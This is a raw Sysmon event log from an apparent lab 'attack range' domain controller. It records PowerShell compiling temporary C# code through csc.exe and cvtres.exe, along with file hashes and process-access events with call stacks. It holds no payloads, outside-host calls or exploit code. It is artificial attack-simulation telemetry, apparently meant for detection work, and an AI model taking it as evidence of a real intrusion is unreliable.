12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.0.csMD5=054C0A1487614BA970CB949FA443FFFB,SHA256=6B88C7F565FF6B5879B03F6F3622B596B63D0C76E3EC5751390A446AF187E21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.outMD5=CE44EC5685EA48CDFB043DE2D6FF69E7,SHA256=005E0886995FDD173D551BA228A2F9269986C7D31AB021B27559180B7B94B314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.pdbMD5=0EF1CFD50038DCC7E6B20ADF4D88B075,SHA256=F5D5457FCF0EB48F37632569CF915E7721A2A0474057A4653E8921C202BB7EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dllMD5=8A63C7D37178433B962D9162A202127C,SHA256=EBD08AC072049CE67F9D3D9C2DF01FF9239D5872C98A43E8EE664B49F813D1A0,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.216{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.216{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\CSCB304B5D2C80A486A9F374553E2D2FFEC.TMPMD5=11300D729435B9F74063D6D241CA597A,SHA256=0DDEF9CDBC4D7291271DA9F7EF659CF9111D4FA48D2F63CED16C6ED2F227C54C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dll2021-03-31 12:00:01.107 23542300x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESD28A.tmpMD5=575CA4D2122A3CB93DF9F3E09BB48D00,SHA256=123DAF9B62137BF993ABB90469D80834FFB1E7329AFB2FE7FF1AF4A4A654FC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.216{266CAFBE-6441-6064-DC02-00000000AD01}2016ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESD28A.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-6441-6064-DB02-00000000AD01}41324208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Fra
mework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.209{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD28A.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCB304B5D2C80A486A9F374553E2D2FFEC.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\sdvgceyb.cmdline" 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.107{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 